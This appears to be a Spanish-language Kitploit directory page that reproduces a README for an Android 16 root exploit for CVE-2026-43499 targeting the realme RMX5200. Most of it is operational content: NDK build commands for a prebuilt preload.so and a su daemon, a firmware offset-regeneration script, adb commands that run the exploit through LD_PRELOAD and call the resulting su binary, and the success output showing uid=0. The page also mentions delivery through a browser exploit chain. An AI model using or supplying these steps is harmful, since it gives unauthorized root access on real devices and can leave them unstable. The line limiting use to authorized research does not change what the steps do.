Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sorrow404null/cve-2026-43499-rmx5200
Seguridad AndroidEscalada de PrivilegiosFrameworks de ExploitsExplotaciónShellcodePost-ExplotaciónSeguridad MóvilDesarrollo de PayloadsExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubsorrow404null/cve-2026-43499-rmx5200

CVE-2026-43499-RMX5200

Exploit de escalada de privilegios local de Android 16 para realme RMX5200 que utiliza una cadena preload.so basada en LD_PRELOAD para lograr acceso root temporal a través de CVE-2026-43499.

Ver Repositorio
6122hace 1 mesAún no revisado

CVE-2026-43499 para realme RMX5200

Escalada de privilegios local SO de la CVE-2026-43499 para:

ElementoValor
Dispositivorealme RMX5200 / RE6030L1
Android16
Kernel6.12.23-android16-5-gb2a876903b49-ab14541642-4k
Huellarealme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys

Binario precompilado: bin/preload.so

Este repositorio conserva solo el árbol de compilación del SO (fuentes + offsets + precompilado). Sin harness de navegador, sin volcados de firmware, sin andamiaje de pruebas.

Basado en la cadena pública estilo IonStack / popsicle; los offsets regenerados a partir de boot.img + xbl_config.img de este dispositivo.


Estructura

root@kitploit:~
.
├── bin/preload.so              # objeto compartido aarch64 precompilado (verificado)
├── generate_target.py          # opcional: regenera target.h desde boot+xbl
├── source/
│   ├── Makefile
│   └── src/
│       ├── target.h            # offsets de RMX5200
│       ├── main.c preload.c slide.c ...
│       └── kernelsnitch/
└── README.md

Compilación

Requisitos:

  • Android NDK (se recomienda r27+)
  • Python 3 + llvm-objdump (solo si se regenera target.h)

Con make

root@kitploit:~
# Ejemplo con NDK en Linux
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload

# Ejemplo con NDK en Windows
make -C source clean preload \
  NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
  NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"

Salida:

root@kitploit:~
source/build/bin/preload.so

Sin make (clang directo)

root@kitploit:~
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"

$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
  src/su_daemon.c -o build/embed/su_daemon_aarch64_pie

$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
  src/preload.c src/su_blob.S \
  -shared -o build/bin/preload.so -pthread

Regenerar offsets (opcional)

Se necesitan las imágenes de firmware coincidentes (no incluidas aquí):

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  --llvm-objdump llvm-objdump \
  -o source/src/target.h

Ejecución

ADB LD_PRELOAD

root@kitploit:~
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

Cadena de navegador (externa)

Cargue este preload.so mediante un host estilo Firefox-151 lonStack (p. ej., entrada de dispositivo Rootme). No se incluye en este repositorio.

Marcadores de éxito:

root@kitploit:~
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
root@kitploit:~
uid=0(root) gid=0(root) ... context=kernel

Notas

  • Solo root temporal — se pierde tras reiniciar.
  • Después del éxito, algunas apps pueden fallar al inicializar el Framework hasta el reinicio (misma clase de efecto secundario que los objetivos públicos relacionados).
  • Los offsets son específicos de la compilación. Otras compilaciones OTA necesitan un nuevo target.h / recompilar.
  • Para investigación de seguridad autorizada en dispositivos de tu propiedad.

Créditos

  • Contexto de investigación pública: informes de IonStack / CVE-2026-43499
  • Linaje de implementación: cadena preload.so estilo popsicle
  • Adaptación de dispositivo: RMX5200 (RE6030L1)
Descargar herramienta